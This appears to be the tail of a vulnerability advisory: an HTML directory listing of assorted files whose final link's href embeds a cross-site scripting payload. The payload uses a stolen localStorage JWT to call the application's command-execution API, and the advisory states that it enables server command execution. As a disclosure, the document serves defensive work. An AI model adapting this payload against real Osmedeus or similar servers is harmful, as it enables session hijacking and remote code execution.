<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Commands can be executed on the server.
References
- GHSA-wvv7-wm5v-w2gv
- https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing